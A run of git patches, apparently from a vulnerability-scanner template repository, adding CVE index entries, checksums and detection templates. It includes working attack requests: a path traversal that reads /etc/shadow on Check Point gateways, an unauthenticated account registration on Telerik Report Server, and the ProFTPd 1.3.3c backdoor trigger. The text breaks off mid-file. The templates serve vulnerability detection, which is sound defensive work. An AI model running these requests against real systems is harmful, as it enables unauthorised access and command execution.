GitHub Action Date: Mon, 3 Jun 2024 08:55:31 +0000 Subject: [PATCH 1696/1768] Auto Generated cves.json [Mon Jun 3 08:55:31 UTC 2024] :robot: --- cves.json | 1 + cves.json-checksum.txt | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index c65ce3d4eb..f21b56b2f4 100644 --- a/cves.json +++ b/cves.json @@ -1550,6 +1550,7 @@ {"ID":"CVE-2022-0656","Info":{"Name":"uDraw \u003c3.3.3 - Local File Inclusion","Severity":"high","Description":"uDraw before 3.3.3 does not validate the url parameter in its udraw_convert_url_to_base64 AJAX action (available to both unauthenticated and authenticated users) before using it in the file_get_contents function and returning its content base64 encoded in the response. As a result, unauthenticated users could read arbitrary files on the web server (such as /etc/passwd, wp-config.php etc).","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-0656.yaml"} {"ID":"CVE-2022-0658","Info":{"Name":"CommonsBooking \u003c 2.6.8 - SQL Injection","Severity":"critical","Description":"The plugin does not sanitise and escape the location parameter of the calendar_data AJAX action (available to unauthenticated users) before it is used in dynamically constructed SQL queries, leading to an unauthenticated SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0658.yaml"} {"ID":"CVE-2022-0660","Info":{"Name":"Microweber \u003c1.2.11 - Information Disclosure","Severity":"high","Description":"Microweber before 1.2.11 is susceptible to information disclosure. An error message is generated in microweber/microweber which contains sensitive information while viewing comments from load_module:comments#search=. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-0660.yaml"} +{"ID":"CVE-2022-0666","Info":{"Name":"Microweber \u003c 1.2.11 - CRLF Injection","Severity":"high","Description":"CRLF Injection leads to Stack Trace Exposure due to lack of filtering at https://demo.microweber.org/ in Packagist microweber/microweber prior to 1.2.11.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-0666.yaml"} {"ID":"CVE-2022-0678","Info":{"Name":"Microweber \u003c1.2.11 - Cross-Site Scripting","Severity":"medium","Description":"Packagist prior to 1.2.11 contains a cross-site scripting vulnerability via microweber/microweber. User can escape the meta tag because the user doesn't escape the double-quote in the $redirectUrl parameter when logging out.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0678.yaml"} {"ID":"CVE-2022-0679","Info":{"Name":"WordPress Narnoo Distributor \u003c=2.5.1 - Local File Inclusion","Severity":"critical","Description":"WordPress Narnoo Distributor plugin 2.5.1 and prior is susceptible to local file inclusion. The plugin does not validate and sanitize the lib_path parameter before being passed into a call to require() via the narnoo_distributor_lib_request AJAX action, and the content of the file is displayed in the response as JSON data. This can also lead to a remote code execution vulnerability depending on system and configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0679.yaml"} {"ID":"CVE-2022-0692","Info":{"Name":"Rudloff alltube prior to 3.0.1 - Open Redirect","Severity":"medium","Description":"An open redirect vulnerability exists in Rudloff/alltube that could let an attacker construct a URL within the application that causes redirection to an arbitrary external domain via Packagist in versions prior to 3.0.1.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0692.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 1f5792643e..08b6bfcb99 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -0cf7a96430fadd9e4602ab1fd647e275 +e808b27672b538f74b345e3d92eb4a9f From f5d5745e125d7fde25230f8f669a7d7cb85b5934 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 3 Jun 2024 08:56:17 +0000 Subject: [PATCH 1697/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index bd3eff7e7e..e6f0d8ab54 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -5,6 +5,7 @@ on: - '.new-additions' - 'headless/webpack-sourcemap.yaml' - 'http/cnvd/2024/CNVD-2024-15077.yaml' + - 'http/cves/2022/CVE-2022-0666.yaml' - 'http/cves/2022/CVE-2022-1580.yaml' - 'http/cves/2022/CVE-2022-34534.yaml' - 'http/cves/2023/CVE-2023-2059.yaml' From 7bba4a2c0f8b2761f904e33b10dd533d06e8f082 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 3 Jun 2024 08:56:38 +0000 Subject: [PATCH 1698/1768] Auto Generated New Template Addition List [Mon Jun 3 08:56:38 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 05d9cd9168..a025f3b8c0 100644 --- a/.new-additions +++ b/.new-additions @@ -61,3 +61,4 @@ http/technologies/gotweb-detect.yaml http/vulnerabilities/other/array-vpn-lfi.yaml http/vulnerabilities/other/cerio-dt-rce.yaml network/detection/bitvise-ssh-detect.yaml +passive/cves/2024/CVE-2024-25723.yaml From 7f9561984ddc5d5fc4789f1e7785fc2157ce575f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 3 Jun 2024 08:56:47 +0000 Subject: [PATCH 1699/1768] Auto Generated Templates Checksum [Mon Jun 3 08:56:47 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d19da2087a..00f4fa1fa5 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -187,8 +187,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:f096845ddb0fa602cfb3fc900f94a098c42ea15b -cves.json-checksum.txt:022276eb87f506fd930108e9e921ca6765d0b969 +cves.json:6c374eeb1f547d318a2f0d87d01236bef68c380c +cves.json-checksum.txt:0b1d7e32abf421aa809f190ddd8f70823694eb05 dast/cves/2018/CVE-2018-19518.yaml:06ecee25413d9f238e2ae0138b4775f0243e8d22 dast/cves/2021/CVE-2021-45046.yaml:d470397419ae4ef5db02b0a833013fe295576396 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -8576,6 +8576,7 @@ network/misconfig/tidb-native-password.yaml:e59b6ae7f999845de1660e740e99c300175f network/misconfig/tidb-unauth.yaml:5c00fa571b47b099a046afc2a7ff5aba4bfd20fd network/misconfig/unauth-psql.yaml:4234beb83e518739f430de109340c402c96a3740 network/vulnerabilities/clockwatch-enterprise-rce.yaml:3b34549e3d1b3ddcddab7a8cdfd7b9c57c8f2d37 +passive/cves/2024/CVE-2024-25723.yaml:1408ea431542b2e64d0c2e3945a0452e45301fd0 profiles/README.md:84e7479141844434737d87eea1ab678c04d11c33 profiles/all.yml:da115a47ed611622537dfbbe17e912010916c741 profiles/aws-cloud-config.yml:35d9feaf76e79bf9b83a33f0f95803a8cc97a9cc @@ -8620,7 +8621,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:816536bc24b240f6eebd29134f71e4e01fb99ca8 +templates-checksum.txt:c31b229fb0da2ec8ad9b16ad0689dc7857e04240 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 44142b84c45c916df42154b14af87aa448b0febe Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 3 Jun 2024 08:57:15 +0000 Subject: [PATCH 1700/1768] Auto Template Signing [Mon Jun 3 08:57:15 UTC 2024] :robot: --- http/cves/2022/CVE-2022-0666.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2022/CVE-2022-0666.yaml b/http/cves/2022/CVE-2022-0666.yaml index 9c53b2277a..251c13f693 100644 --- a/http/cves/2022/CVE-2022-0666.yaml +++ b/http/cves/2022/CVE-2022-0666.yaml @@ -34,3 +34,4 @@ http: part: header regex: - "^Set-Cookie: crlfinjection=1;" +# digest: 4b0a00483046022100dbd652bb2a658ea86b3c2000925f84a9d94f2590ae25dcf69528a640aad4d9db022100ca9fb2e31600744fe5f05e0df21043f5c3922f1b82c6ab3729780e0e2e4203b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 24d27ff16258ca14a6683a57644bffc33dc14a46 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 3 Jun 2024 08:57:27 +0000 Subject: [PATCH 1701/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index e6f0d8ab54..9337c8a45f 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -66,6 +66,7 @@ on: - 'http/vulnerabilities/other/array-vpn-lfi.yaml' - 'http/vulnerabilities/other/cerio-dt-rce.yaml' - 'network/detection/bitvise-ssh-detect.yaml' + - 'passive/cves/2024/CVE-2024-25723.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 471b3a5ba3876cf101b51a2c7d7edbbf81196e81 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 3 Jun 2024 09:01:59 +0000 Subject: [PATCH 1702/1768] Auto Template Signing [Mon Jun 3 09:01:59 UTC 2024] :robot: --- passive/cves/2024/CVE-2024-25723.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/passive/cves/2024/CVE-2024-25723.yaml b/passive/cves/2024/CVE-2024-25723.yaml index 3d34c505da..de606fe734 100644 --- a/passive/cves/2024/CVE-2024-25723.yaml +++ b/passive/cves/2024/CVE-2024-25723.yaml @@ -47,3 +47,4 @@ http: regex: - '"version":"(.*?)"' internal: true +# digest: 4a0a00473045022100a3620df7f00a1667d7ff1a1a8334e1e280a30c3ff0b67dae912a60cfd78e85750220406c282e2b21dfaded95153cb05a70fc5e53f06119c22e81d98cc24b8345d94b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 7abea3004f5d2ac18d04e2a2ff3ba1fb304d2208 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 3 Jun 2024 14:32:41 +0530 Subject: [PATCH 1703/1768] update metadata --- http/cves/2024/CVE-2024-27348.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-27348.yaml b/http/cves/2024/CVE-2024-27348.yaml index 8ea9e840a5..1cf870bafa 100644 --- a/http/cves/2024/CVE-2024-27348.yaml +++ b/http/cves/2024/CVE-2024-27348.yaml @@ -21,8 +21,8 @@ info: metadata: verified: true max-request: 1 - shodan-query: title:"HugeGraph Studio" - fofa-query: title="HugeGraph Studio" + shodan-query: title:"HugeGraph" + fofa-query: title="HugeGraph" tags: cve,cve2024,hugegraph,rce,apache http: From 9a5c0cae2d06078a2ef555101ae4df27d033ead2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 3 Jun 2024 09:05:42 +0000 Subject: [PATCH 1704/1768] Auto Generated Templates Checksum [Mon Jun 3 09:05:42 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 00f4fa1fa5..49882b27ee 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2447,7 +2447,7 @@ http/cves/2022/CVE-2022-0653.yaml:52274e93b6ea8926e170293dce796d792a5e0a48 http/cves/2022/CVE-2022-0656.yaml:2975cb24c367f2e0bf11b3a966529591c8ed2edf http/cves/2022/CVE-2022-0658.yaml:2b1f5971384f81ffce9e3a8427555bbd01b3b3a5 http/cves/2022/CVE-2022-0660.yaml:847e3682f3a3903749f0d44adf0697a838a405e4 -http/cves/2022/CVE-2022-0666.yaml:9333df97b369c29cff7be3249e4eaaa7257fd446 +http/cves/2022/CVE-2022-0666.yaml:0d419de095f12254b58c3b9b13c86ab3e6969390 http/cves/2022/CVE-2022-0678.yaml:8b33e92b350e562c7bece96f5e9328e7319792ae http/cves/2022/CVE-2022-0679.yaml:bb862b57bb18b1832313bed2c8f3095286ab5f0b http/cves/2022/CVE-2022-0692.yaml:16bb78665f4c62b041bf0641d2afe49587c40472 @@ -3286,6 +3286,7 @@ http/cves/2024/CVE-2024-25735.yaml:e6bb34d06213eebd89b7290f8a32a2c43772f8b6 http/cves/2024/CVE-2024-26331.yaml:717487e16279f4cd2d5666a4d83ab53f0475c4a2 http/cves/2024/CVE-2024-27198.yaml:11820d1d61eb185078709185d0cda080414cb333 http/cves/2024/CVE-2024-27199.yaml:6004f38f3a24fbb3a951270191c4af21b6e14e2d +http/cves/2024/CVE-2024-27348.yaml:b6afd2794a4897d3ea0154168726979ebd947dc6 http/cves/2024/CVE-2024-27497.yaml:60398b33810f93340a2641b108c2ed83ed635e88 http/cves/2024/CVE-2024-27564.yaml:59fbfb7c059d110b9a807d0d2205058ae1326e6b http/cves/2024/CVE-2024-27954.yaml:fe69ea721d3341747af165f3378e4f8bedb2ff43 @@ -8576,7 +8577,7 @@ network/misconfig/tidb-native-password.yaml:e59b6ae7f999845de1660e740e99c300175f network/misconfig/tidb-unauth.yaml:5c00fa571b47b099a046afc2a7ff5aba4bfd20fd network/misconfig/unauth-psql.yaml:4234beb83e518739f430de109340c402c96a3740 network/vulnerabilities/clockwatch-enterprise-rce.yaml:3b34549e3d1b3ddcddab7a8cdfd7b9c57c8f2d37 -passive/cves/2024/CVE-2024-25723.yaml:1408ea431542b2e64d0c2e3945a0452e45301fd0 +passive/cves/2024/CVE-2024-25723.yaml:3a0e459386db639b4548a3c5588bbb80fa80ad29 profiles/README.md:84e7479141844434737d87eea1ab678c04d11c33 profiles/all.yml:da115a47ed611622537dfbbe17e912010916c741 profiles/aws-cloud-config.yml:35d9feaf76e79bf9b83a33f0f95803a8cc97a9cc @@ -8621,7 +8622,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c31b229fb0da2ec8ad9b16ad0689dc7857e04240 +templates-checksum.txt:2b8fbacfb2772cd3809af3bccae99ba38931ed8e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 5e30a1480ce24acf1fa1a84225cc9ef71f5d2bb5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 3 Jun 2024 09:05:44 +0000 Subject: [PATCH 1705/1768] Auto Generated cves.json [Mon Jun 3 09:05:44 UTC 2024] :robot: --- cves.json | 1 + cves.json-checksum.txt | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index f21b56b2f4..0d999c385b 100644 --- a/cves.json +++ b/cves.json @@ -2389,6 +2389,7 @@ {"ID":"CVE-2024-26331","Info":{"Name":"ReCrystallize Server - Authentication Bypass","Severity":"high","Description":"This vulnerability allows an attacker to bypass authentication in the ReCrystallize Server application by manipulating the 'AdminUsername' cookie. This gives the attacker administrative access to the application's functionality, even when the default password has been changed.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-26331.yaml"} {"ID":"CVE-2024-27198","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"critical","Description":"In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-27198.yaml"} {"ID":"CVE-2024-27199","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"high","Description":"In JetBrains TeamCity before 2023.11.4 path traversal allowing to perform limited admin actions was possible\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-27199.yaml"} +{"ID":"CVE-2024-27348","Info":{"Name":"Apache HugeGraph-Server - Remote Command Execution","Severity":"high","Description":"Apache HugeGraph-Server is an open-source graph database that provides a scalable and high-performance solution for managing and analyzing large-scale graph data. It is commonly used in Java8 and Java11 environments. However, versions prior to 1.3.0 are vulnerable to a remote command execution (RCE) vulnerability in the gremlin component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27348.yaml"} {"ID":"CVE-2024-27497","Info":{"Name":"Linksys E2000 1.0.06 position.js Improper Authentication","Severity":"high","Description":"Linksys E2000 Ver.1.0.06 build 1 is vulnerable to authentication bypass via the position.js file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27497.yaml"} {"ID":"CVE-2024-27564","Info":{"Name":"ChatGPT个人专用版 - Server Side Request Forgery","Severity":"high","Description":"A Server-Side Request Forgery (SSRF) in pictureproxy.php of ChatGPT commit f9f4bbc allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the urlparameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27564.yaml"} {"ID":"CVE-2024-27954","Info":{"Name":"WordPress Automatic Plugin \u003c3.92.1 - Arbitrary File Download and SSRF","Severity":"critical","Description":"WordPress Automatic plugin \u003c3.92.1 is vulnerable to unauthenticated Arbitrary File Download and SSRF Located in the downloader.php file, could permit attackers to download any file from a site. Sensitive data, including login credentials and backup files, could fall into the wrong hands. This vulnerability has been patched in version 3.92.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-27954.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 08b6bfcb99..b9cdde8cf7 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -e808b27672b538f74b345e3d92eb4a9f +d337d7264c683ea11584b411b8bcb172 From 10e92b1204f23742aef701ad3d0c1402a3148794 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 3 Jun 2024 09:07:30 +0000 Subject: [PATCH 1706/1768] Auto Template Signing [Mon Jun 3 09:07:30 UTC 2024] :robot: --- http/cves/2024/CVE-2024-27348.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-27348.yaml b/http/cves/2024/CVE-2024-27348.yaml index 1cf870bafa..6aee1c8210 100644 --- a/http/cves/2024/CVE-2024-27348.yaml +++ b/http/cves/2024/CVE-2024-27348.yaml @@ -41,3 +41,4 @@ http: - 'contains(header, "application/json")' - 'contains(body, "inputStream\":")' condition: and +# digest: 4a0a00473045022100aa9ae92d5900b75820e9ffcd29849fac5041ac03f2ae87c595cd533beb114ca002206bb3b4a4720b2ec86023bcbef0e2274fc1fb729953519ccad6dded1328e88770:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 5addd1de0e3b4390ccdb316ff6536c8a84a48e1e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 3 Jun 2024 16:10:34 +0530 Subject: [PATCH 1707/1768] Create CVE-2024-4358.yaml --- http/cves/2024/CVE-2024-4358.yaml | 87 +++++++++++++++++++++++++++++++ 1 file changed, 87 insertions(+) create mode 100644 http/cves/2024/CVE-2024-4358.yaml diff --git a/http/cves/2024/CVE-2024-4358.yaml b/http/cves/2024/CVE-2024-4358.yaml new file mode 100644 index 0000000000..3e15ec1b3f --- /dev/null +++ b/http/cves/2024/CVE-2024-4358.yaml @@ -0,0 +1,87 @@ +id: CVE-2024-4358 + +info: + name: Telerik Report Server - Authentication Bypass + author: DhiyaneshDK + severity: critical + description: | + In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability. + reference: + - https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/ + - https://github.com/sinsinology/CVE-2024-4358 + metadata: + shodan-query: "Log in | Telerik Report Server" + tags: cve,cve2024,telerik,progress,auth-bypass + +variables: + user: "{{rand_base(6)}}" + pass: "{{rand_base(8)}}" + email: "{{randstr}}@{{rand_base(5)}}.com" + firstname: "{{rand_base(5)}}" + lastname: "{{rand_base(5)}}" + report: "{{to_lower(rand_text_alpha(8))}}" + + content: {{}} ##To Be Added + +http: + - raw: + - | + POST /Startup/Register HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + Username={{user}}&Password={{pass}}&ConfirmPassword={{pass}}&Email={{email}}&FirstName={{firstname}}&LastName={{lastname}} + + - | + POST /Token HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + grant_type=password&username={{user}}&password={{pass}} + + - | + POST /api/reportserver/report HTTP/1.1 + Host: {{Hostname}} + Authorization: Bearer {{token}} + Content-Type: application/json + + {"reportName": "{{report}}", "categoryName": "Samples", "description": null, "reportContent": "{{content}}", "extension": ".trdp"} + + - | + POST /api/reports/clients HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"timeStamp": null} + + - | + POST /api/reports/clients/{{clientid}}/parameters HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"report": "NAME/Samples/{{report}}/", "parameterValues": {}} + + matchers: + - type: dsl + dsl: + - 'contains(content_type_2, "application/json")' + - 'contains(body_2, "access_token") && contains(body_4, "clientId") && contains(body_5, "message")' + - 'status_code_2 == 200' + condition: and + + extractors: + - type: regex + name: token + part: body_2 + group: 1 + regex: + - '"access_token":"([A-Z0-9a-z_-]+)"' + internal: true + + - type: regex + name: clientid + part: body_4 + group: 1 + regex: + - '"clientId":"([a-z0-9]+)"' + internal: true From a2e926b9542274a3cf43c98579a06a3312b7145e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 3 Jun 2024 16:13:57 +0530 Subject: [PATCH 1708/1768] fix lint error --- http/cves/2024/CVE-2024-4358.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-4358.yaml b/http/cves/2024/CVE-2024-4358.yaml index 3e15ec1b3f..3919c7c39f 100644 --- a/http/cves/2024/CVE-2024-4358.yaml +++ b/http/cves/2024/CVE-2024-4358.yaml @@ -20,8 +20,7 @@ variables: firstname: "{{rand_base(5)}}" lastname: "{{rand_base(5)}}" report: "{{to_lower(rand_text_alpha(8))}}" - - content: {{}} ##To Be Added + content: "{{}}" ##To Be Added http: - raw: From 95b63e3b864b5f6b36ab270a8bdca2d7d2da3778 Mon Sep 17 00:00:00 2001 From: DevSecOps Date: Mon, 3 Jun 2024 08:20:37 -0400 Subject: [PATCH 1709/1768] modified regex and added more request parameters --- http/cves/2024/CVE-2024-24919.yaml | 16 +++++++++------- 1 file changed, 9 insertions(+), 7 deletions(-) diff --git a/http/cves/2024/CVE-2024-24919.yaml b/http/cves/2024/CVE-2024-24919.yaml index 4ed2a49243..70d85637df 100644 --- a/http/cves/2024/CVE-2024-24919.yaml +++ b/http/cves/2024/CVE-2024-24919.yaml @@ -5,17 +5,17 @@ info: author: johnk3r severity: high description: | - CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN or mobile access software blade. + CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN, or mobile access software blade. reference: - https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/ - https://support.checkpoint.com/results/sk/sk182337 metadata: - verified: true max-request: 1 vendor: checkpoint product: quantum_security_gateway - shodan-query: html:"Check Point SSL Network" cpe: cpe:2.3:h:checkpoint:quantum_security_gateway:*:*:*:*:*:*:*:* + shodan-query: html:"Check Point SSL Network" + verified: true tags: cve,cve2024,checkpoint,lfi http: @@ -23,19 +23,21 @@ http: - | POST /clients/MyCRL HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.2.7 + Content-Length: 39 + Accept-Encoding: gzip + Connection: close aCSHELL/../../../../../../../etc/shadow - matchers-condition: and matchers: - type: regex part: body regex: - - "root:" - - "nobody:" + - "root:.*" + - "nobody:.*" condition: and - type: status status: - 200 -# digest: 490a0046304402200cbd9f1fc5ea98e5649de5e1b43d62d38241188c12d1f4cf19709e2b2aab31a50220643a5fbf43545d89dd02819e0e92ee7fb898212836c04be5c18d446b1950705d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From a365149f938ed0d5e167a1d5a8cfd67da6a5c913 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 3 Jun 2024 17:51:14 +0530 Subject: [PATCH 1710/1768] minor update --- http/cves/2024/CVE-2024-4358.yaml | 46 ++++++++----------------------- 1 file changed, 12 insertions(+), 34 deletions(-) diff --git a/http/cves/2024/CVE-2024-4358.yaml b/http/cves/2024/CVE-2024-4358.yaml index 3919c7c39f..32f7e2d3b0 100644 --- a/http/cves/2024/CVE-2024-4358.yaml +++ b/http/cves/2024/CVE-2024-4358.yaml @@ -1,16 +1,21 @@ id: CVE-2024-4358 info: - name: Telerik Report Server - Authentication Bypass + name: Progress Telerik Report Server - Authentication Bypass author: DhiyaneshDK severity: critical description: | In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability. + impact: An unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability. + remediation: Updating to Report Server 2024 Q2 (10.1.24.514) or later. reference: - https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/ - https://github.com/sinsinology/CVE-2024-4358 + - https://docs.telerik.com/report-server/knowledge-base/registration-auth-bypass-cve-2024-4358 metadata: - shodan-query: "Log in | Telerik Report Server" + shodan-query: title:"Log in | Telerik Report Server" + verified: true + max-request: 2 tags: cve,cve2024,telerik,progress,auth-bypass variables: @@ -19,8 +24,6 @@ variables: email: "{{randstr}}@{{rand_base(5)}}.com" firstname: "{{rand_base(5)}}" lastname: "{{rand_base(5)}}" - report: "{{to_lower(rand_text_alpha(8))}}" - content: "{{}}" ##To Be Added http: - raw: @@ -38,33 +41,11 @@ http: grant_type=password&username={{user}}&password={{pass}} - - | - POST /api/reportserver/report HTTP/1.1 - Host: {{Hostname}} - Authorization: Bearer {{token}} - Content-Type: application/json - - {"reportName": "{{report}}", "categoryName": "Samples", "description": null, "reportContent": "{{content}}", "extension": ".trdp"} - - - | - POST /api/reports/clients HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"timeStamp": null} - - - | - POST /api/reports/clients/{{clientid}}/parameters HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"report": "NAME/Samples/{{report}}/", "parameterValues": {}} - matchers: - type: dsl dsl: - 'contains(content_type_2, "application/json")' - - 'contains(body_2, "access_token") && contains(body_4, "clientId") && contains(body_5, "message")' + - 'contains_all(body_2, "access_token", "userName", "token_type")' - 'status_code_2 == 200' condition: and @@ -77,10 +58,7 @@ http: - '"access_token":"([A-Z0-9a-z_-]+)"' internal: true - - type: regex - name: clientid - part: body_4 - group: 1 - regex: - - '"clientId":"([a-z0-9]+)"' - internal: true + - type: dsl + dsl: + - '"Username: "+ user' + - '"Password: "+ pass' From b6fd10317c4be27d48e79b32a48e8a23b5c4b965 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 3 Jun 2024 20:27:48 +0530 Subject: [PATCH 1711/1768] ProFTPd-1.3.3c - Backdoor Command Execution --- javascript/backdoor/proftpd-backdoor.yaml | 47 +++++++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 javascript/backdoor/proftpd-backdoor.yaml diff --git a/javascript/backdoor/proftpd-backdoor.yaml b/javascript/backdoor/proftpd-backdoor.yaml new file mode 100644 index 0000000000..dec673b6fc --- /dev/null +++ b/javascript/backdoor/proftpd-backdoor.yaml @@ -0,0 +1,47 @@ +id: proftpd-backdoor + +info: + name: ProFTPd-1.3.3c - Backdoor Command Execution + author: pussycat0x + severity: critical + description: | + This backdoor was present in the proftpd-1.3.3c. + reference: + - https://github.com/shafdo/ProFTPD-1.3.3c-Backdoor_Command_Execution_Automated_Script/blob/main/README.md + - https://www.rapid7.com/db/modules/exploit/unix/ftp/proftpd_133c_backdoor/ + metadata: + shodan-query: product:"ProFTPD" + tags: js,network,proftpd,ftp,backdoor + +javascript: + - code: | + const data = ["HELP ACIDBITCHEZ\n", "id"]; + const c = require("nuclei/net"); + let conn = c.Open('tcp', `${Host}:${Port}`); + let 